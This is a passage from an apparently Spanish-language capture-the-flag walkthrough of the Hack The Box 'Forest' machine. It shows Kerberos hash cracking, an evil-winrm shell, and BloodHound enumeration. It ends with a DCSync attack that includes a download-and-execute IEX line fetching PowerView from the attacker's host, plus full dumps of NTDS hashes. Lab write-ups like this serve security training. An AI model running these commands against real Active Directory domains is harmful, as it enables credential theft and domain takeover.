       │ 4abb9c4825e9ccadfc7092134dd80168e650a4e8a921633da8cdd84f76bfffce20ee52019f94ceea61b590b65dc02cee2062327273c6198b5dd38c858fcd928
       │ 180fe7eb025c9c1da11982
───────┴────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
                                                                                                                                        
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#

`2.3 John The Ripper con el hash obtenido del ticket de Kerberos`

Una vez obtenido el hash del usuario "svc-alfresco", vamos a utilizar John The Ripper para obtener la contraseña del mismo en texto plano:

john --wordlist=/usr/share/wordlists/rockyou.txt svc-alfresco.txt

(Utilizamos el diccionario de rockyou)

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt svc-alfresco.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)     
1g 0:00:00:08 DONE (2025-03-06 15:10) 0.1141g/s 466410p/s 466410c/s 466410C/s s401447401447401447..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                        
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#

Obtuvimos la contraseña

Usuario: svc-alfresco
Contraseña: s3rvice

`2.4 Reverse shell con evil-winrm`

Ahora vamos a utilizar crackmapexec para verificar las credenciales obtenidas, para logearnos mediante "evil-winrm", pero vamos a agregarle el parámetro "-d" para especificar el dominio:

crackmapexec winrm -u 'svc-alfresco' -p 's3rvice' -d htb.local 10.10.10.161

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# crackmapexec winrm -u 'svc-alfresco' -p 's3rvice' -d htb.local 10.10.10.161
HTTP        10.10.10.161    5985   10.10.10.161     [*] http://10.10.10.161:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.10.161    5985   10.10.10.161     [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
                                                                                                                                        
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#

Ahora vamos a logearnos con "evil-winrm", ya que sabemos que las credenciales son validas:

evil-winrm -u 'svc-alfresco' -p 's3rvice' -i 10.10.10.161

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# evil-winrm -u 'svc-alfresco' -p 's3rvice' -i 10.10.10.161
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

`2.5 Obtención de la flag user`

La flag de usuario se encuentra dentro de la ruta absoluta "C:\Users\svc-alfresco\Desktop":

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd "C:\Users\svc-alfresco\Desktop"
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
f8cd89b0843eea69160d5c5448e0ec96
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>

3- Escalado de privilegios

`3.1 BloodHound`

Para escalar privilegios, vamos a utilizar BloodHound, una herramienta para entornos de directorio activo, que nos enumera los permisos de los usuarios del directorio activo mas detalladamente

Para utilizar BloodHound vamos a necesitar abrir un servicio en Kali, llamado neo4j, que es el servicio que nos permite utilizar BloodHound, neo4j es un servicio de base de datos, que se aloja en el puerto 7687, vamos a instalar la herramienta con el gestor de paquetes "apt":

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# sudo apt-get install neo4j 
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias... Hecho
Leyendo la información de estado... Hecho
Los paquetes indicados a continuación se instalaron de forma automática y ya no son necesarios.
  libldap-2.5-0 libpython3.12-dev python3.12 python3.12-dev python3.12-minimal python3.12-venv
Utilice «sudo apt autoremove» para eliminarlos.
Se instalarán los siguientes paquetes adicionales:
  binfmt-support fastjar jarwrapper openjdk-11-jre openjdk-11-jre-headless
Paquetes sugeridos:
  fonts-ipafont-gothic fonts-ipafont-mincho fonts-wqy-microhei | fonts-wqy-zenhei fonts-indic
Se instalarán los siguientes paquetes NUEVOS:
  binfmt-support fastjar jarwrapper neo4j openjdk-11-jre openjdk-11-jre-headless
0 actualizados, 6 nuevos se instalarán, 0 para eliminar y 785 no actualizados.
Se necesita descargar 138 MB de archivos.
Se utilizarán 289 MB de espacio de disco adicional después de esta operación.
¿Desea continuar? [S/n] S

Y para poner en marcha neo4j, vamos a utilizar el comando "neo4j console":

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# neo4j console 
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
2025-03-06 18:30:32.789+0000 INFO  Starting...
2025-03-06 18:30:34.545+0000 INFO  This instance is ServerId{7e9c33b3} (7e9c33b3-8359-4c29-913d-b4b46de030b1)
2025-03-06 18:30:36.430+0000 INFO  ======== Neo4j 4.4.26 ========
2025-03-06 18:30:38.655+0000 INFO  Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2025-03-06 18:30:38.669+0000 INFO  Setting up initial user from defaults: neo4j
2025-03-06 18:30:38.672+0000 INFO  Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2025-03-06 18:30:38.695+0000 INFO  Setting version for 'security-users' to 3
2025-03-06 18:30:38.699+0000 INFO  After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2025-03-06 18:30:38.710+0000 INFO  Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2025-03-06 18:30:41.792+0000 INFO  Bolt enabled on localhost:7687.
2025-03-06 18:30:43.084+0000 INFO  Remote interface available at http://localhost:7474/
2025-03-06 18:30:43.090+0000 INFO  id: A53CF8AB6179D63A38C7EFF613B6CBB1EA39E685117FA81BEE0560291EF861FF
2025-03-06 18:30:43.090+0000 INFO  name: system
2025-03-06 18:30:43.091+0000 INFO  creationDate: 2025-03-06T18:30:37.203Z
2025-03-06 18:30:43.091+0000 INFO  Started.

Vemos que el servicio se encuentra corriendo el servicio "neo4j" correctamente y que esta alojado en local "localhost", por el puerto 7687, "http://localhost:7474/", asi que vamos a irnos a nuestro navegador de preferencia dentro de Kali y vamos a ingresar a "neo4j":

Tenemos un panel de login, las credenciales por default son "neo4j/neo4j":

Nos va a pedir una password nueva:

La ingresamos:

Y ahora por ultimo, vamos a instalar BloodHund con "apt", que ya viene dentro de los repositorios oficiales de Kali:

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# sudo apt-get install bloodhound
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias... Hecho
Leyendo la información de estado... Hecho
Los paquetes indicados a continuación se instalaron de forma automática y ya no son necesarios.
  libldap-2.5-0 libpython3.12-dev python3.12 python3.12-dev python3.12-minimal python3.12-venv
Utilice «sudo apt autoremove» para eliminarlos.
Se instalarán los siguientes paquetes NUEVOS:
  bloodhound
0 actualizados, 1 nuevos se instalarán, 0 para eliminar y 785 no actualizados.
Se necesita descargar 69,3 MB de archivos.
Se utilizarán 274 MB de espacio de disco adicional después de esta operación.
Des:1 http://kali.download/kali kali-rolling/main amd64 bloodhound amd64 4.3.1-0kali2 [69,3 MB]
Descargados 69,3 MB en 7s (9.532 kB/s)                                                                                                 
Seleccionando el paquete bloodhound previamente no seleccionado.
(Leyendo la base de datos ... 411133 ficheros o directorios instalados actualmente.)
Preparando para desempaquetar .../bloodhound_4.3.1-0kali2_amd64.deb ...
Desempaquetando bloodhound (4.3.1-0kali2) ...
Configurando bloodhound (4.3.1-0kali2) ...
Procesando disparadores para kali-menu (2025.1.1) ...
                                                                                                                                        
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#

Ejecutamos BloodHound:

Y ingresamos las credenciales de neo4j, incluyendo la password nueva que ingresamos dentro del panel de neo4j:

(El usuario sigue siendo "neo4j" y la contraseña es la que ingresamos anteriormente para cambiarla cuando instalamos neo4j)

`3.2 SharpHound`

Para extraer la información de la maquina objetivo, vamos a utilizar "SharpHound", donde nos va a extraer y enumerar la información del entorno de directorio activo y lo va a comprimir un .ZIP, que luego se lo pasaremos a la herramienta "BloodHound", SharpHound pertenece a la suite de herramientas de BloodHound

Repositorio de SharpHound

Podemos descargarnos SharpHound del repositorio de GitHub oficial, en mi caso utilizare la ultima versión a la fecha de SharpHound, la release 2.6.0:

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# ls -la | grep 'SharpHound'
-rw-rw-r-- 1 t0mz t0mz 1275392 mar  4 23:23 SharpHound.exe
                                                                                                                                        
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#

Una vez descargado, vamos a pasar este archivo "SharpHound" a la maquina objetivo donde obtuvimos una shell con "evil-winrm", para eso utilizaremos el comando integrado de "Upload" de la misma herramienta "evil-winrm" utilizando el siguiente comando:

upload {Ruta absoluta de SharpHound.exe}

En mi caso

upload /home/t0mz/ctf/forest/SharpHound.exe

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> upload /home/t0mz/ctf/forest/SharpHound.exe
                                        
Info: Uploading /home/t0mz/ctf/forest/SharpHound.exe to C:\Users\svc-alfresco\Desktop\SharpHound.exe
                                        
Data: 1700520 bytes of 1700520 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>

Y lo ejecutaremos:

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> .\SharpHound.exe
2025-03-06T11:13:02.4769017-08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-03-06T11:13:02.6644092-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2025-03-06T11:13:02.7269185-08:00|INFORMATION|Initializing SharpHound at 11:13 AM on 3/6/2025
2025-03-06T11:13:02.7894015-08:00|INFORMATION|Resolved current domain to htb.local
2025-03-06T11:13:03.1644257-08:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2025-03-06T11:13:03.3050276-08:00|INFORMATION|Beginning LDAP search for htb.local
2025-03-06T11:13:03.4769038-08:00|INFORMATION|Beginning LDAP search for htb.local Configuration NC
2025-03-06T11:13:03.4925238-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for HTB.LOCAL
2025-03-06T11:13:03.4925238-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for HTB.LOCAL
2025-03-06T11:13:03.5706477-08:00|INFORMATION|Producer has finished, closing LDAP channel
2025-03-06T11:13:03.5862723-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-03-06T11:13:04.2737754-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for HTB.LOCAL
2025-03-06T11:13:05.7581481-08:00|ERROR|An unhandled error occurred during the LDAP test: System.InvalidOperationException: Server did return a challenge
   at SharpHoundCommonLib.Ntlm.LdapConnection.SaslBind(String distinguishedName, String mechanism, Byte[] credential)
   at System.Threading.Tasks.Task`1.InnerInvoke()
   at System.Threading.Tasks.Task.Execute()
--- End of stack trace from previous location where exception was thrown ---
   at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
   at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   at SharpHoundCommonLib.Ntlm.LdapTransport.<AuthenticateAsync>d__12.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
   at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
   at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   at SharpHoundCommonLib.Ntlm.NtlmAuthenticationHandler.<PerformNtlmAuthenticationAsync>d__7.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
   at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
   at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   at SharpHoundCommonLib.Processors.DCLdapProcessor.<Authenticate>d__14.MoveNext()
2025-03-06T11:13:05.8206553-08:00|INFORMATION|Consumers finished, closing output channel
2025-03-06T11:13:05.9300293-08:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2025-03-06T11:13:06.3987895-08:00|INFORMATION|Status: 475 objects finished (+475 158.3333)/s -- Using 45 MB RAM
2025-03-06T11:13:06.3987895-08:00|INFORMATION|Enumeration finished in 00:00:03.1164499
2025-03-06T11:13:06.5394114-08:00|INFORMATION|Saving cache with stats: 24 ID to type mappings.
 0 name to SID mappings.
 1 machine sid mappings.
 3 sid to domain mappings.
 0 global catalog mappings.
2025-03-06T11:13:06.5706657-08:00|INFORMATION|SharpHound Enumeration Completed at 11:13 AM on 3/6/2025! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>

Listamos directorios:

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/6/2025  11:13 AM          44259 20250306111305_BloodHound.zip
-a----         3/6/2025  11:13 AM           1768 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----         3/6/2025  11:11 AM        1275392 SharpHound.exe
-ar---         3/6/2025   6:36 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>

Y para bajarnos ese archivo .ZIP que nos genero la herramienta, utilizaremos el comando "download" que ya viene integrada en "evil-winrm":

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> download 20250306111305_BloodHound.zip
                                        
Info: Downloading C:\Users\svc-alfresco\Desktop\20250306111305_BloodHound.zip to 20250306111305_BloodHound.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# ls
20250306111305_BloodHound.zip  escaneo.txt  ping.txt  SharpHound.exe  svc-alfresco.txt  users.txt
                                                                                                                                        
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#

Y ahora podemos importar el archivo .ZIP a BloodHound con el siguiente boton a la derecha del panel de BloodHound:

Y vamos a esperar a que termine de subir los datos del archivo ZIP:

Una vez subido todo, en el campo de busqueda, vamos a buscar el usuario "svc-alfresco":

Le damos click derecho al usuario y "Mark User as Owned" y a "Set as Starting Node":

Nos va a aparecer toda la topologia de los grupos y los usuarios dentro del directorio activo:

Investigando en BloodHound, me di cuenta que el uusario "svc-alfresco" tiene permisos para crear usuarios(ACCOUNT OPERATORS@HTB.LOCAL) dentro del entorno de directorio activo(SERVICE ACCOUNTS@HTB.LOCAL)

Podemos ver que el usuario que comprometimos "svc_alfresco" pertenece al grupo "SERVICE ACCOUNTS@HTB.LOCAL" y que a su vez pertence a "PRIVILEGED IT ACCOUNTS@HTB.LOCAL"

Y que además a la vez el grupo "PRIVILEGED IT ACCOUNTS@HTB.LOCAL" pertenece a "ACCOUNT OPERATORS@HTB.LOCAL"

`3.3 Ataque DCSync - WriteAcl`

Vamos a realizar un ataque DCSync para obtener los hashes de los usuarios, entre ellos el usuario "Administrator"

Como pudimos ver el usuario "svc-alfresco" podia crear usuarios, asi que vamos a crear uno dentro de la shell de "evil-winrm" y vamos a listar información sobre el mismo:

*Evil-WinRM* PS C:\Users> net user t0mz password1 /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users> net user t0mz
User name                    t0mz
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            3/6/2025 1:30:29 PM
Password expires             Never
Password changeable          3/7/2025 1:30:29 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users>

Y ahora, vamos a asignarle el grupo "Exchange Windows Permissions" al usuario que acabamos de crear:

*Evil-WinRM* PS C:\Users> net group "Exchange Windows Permissions" t0mz /add
The command completed successfully.

*Evil-WinRM* PS C:\Users>

Ahora vamos a asignarle el privilegio DCSync al usuario que acabamos de crear, para eso utilizamos el siguiente comando:

$SecPassword = ConvertTo-SecureString 'password1' -AsPlainText -Force

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $SecPassword = ConvertTo-SecureString 'password1' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>

Y por otro lado vamos a definir una credencial en un objeto con el siguiente comando:

$Cred = New-Object System.Management.Automation.PSCredential('htb.local\t0mz', $SecPassword)

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\t0mz', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>

Y ahora para manipular este objeto "$Cred" que acabamos de crear, vamos a utilizar "PowerView.ps1" del repositorio de PowerSploit, asi que vamos a bajarnos el siguiente script:

PowerView.ps1

Lo bajamos con "wget":

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Recon/PowerView.ps1

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Recon/PowerView.ps1
--2025-03-06 19:45:35--  https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Recon/PowerView.ps1
Resolviendo raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
Conectando con raw.githubusercontent.com (raw.githubusercontent.com)[185.199.111.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 770279 (752K) [text/plain]
Grabando a: «PowerView.ps1»

PowerView.ps1                   100%[====================================================>] 752,23K  --.-KB/s    en 0,08s   

2025-03-06 19:45:35 (8,82 MB/s) - «PowerView.ps1» guardado [770279/770279]

                                                                                                                             
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# ls -la | grep 'PowerView.ps1'
-rw-r--r-- 1 root root 770279 mar  6 19:45 PowerView.ps1
                                                                                                                             
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#

Vamos a alojar un servidor we con Python para pasarnos el archivo a la maquina objetivo:

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# python3 -m http.server 80                                     
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Y vamos a irnos a "evil-winrm" nuevamente para bajarnos el archivo con el comando:

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.12/PowerView.ps1')

En mi caso, la IP que me asigno la VPN de Hack The Box es la 10.10.10.14.12, en tu caso deberias poner la IP que te asigno Hack The Box

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.12/PowerView.ps1')
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>

Y ahora si, vamos a asignarle el permiso DCSync al usuario que creamos con el siguiente comando:

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity t0mz -Rights DCSync

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity t0mz -Rights DCSync
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>

Por ultimo, vamos a obtener la credencial del usuario "Administrator" hasheada, para eso vamos a utilizar "impacket-secretsdump", con el siguiente comando indicandole el dominio, el usuario y la IP:

impacket-secretsdump htb.local/t0mz@10.10.10.161

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# impacket-secretsdump htb.local/t0mz@10.10.10.161                                
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
usuario1:9601:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
t0mz:9602:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:c6e7c29b591363453a348bb57a63f7f1:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
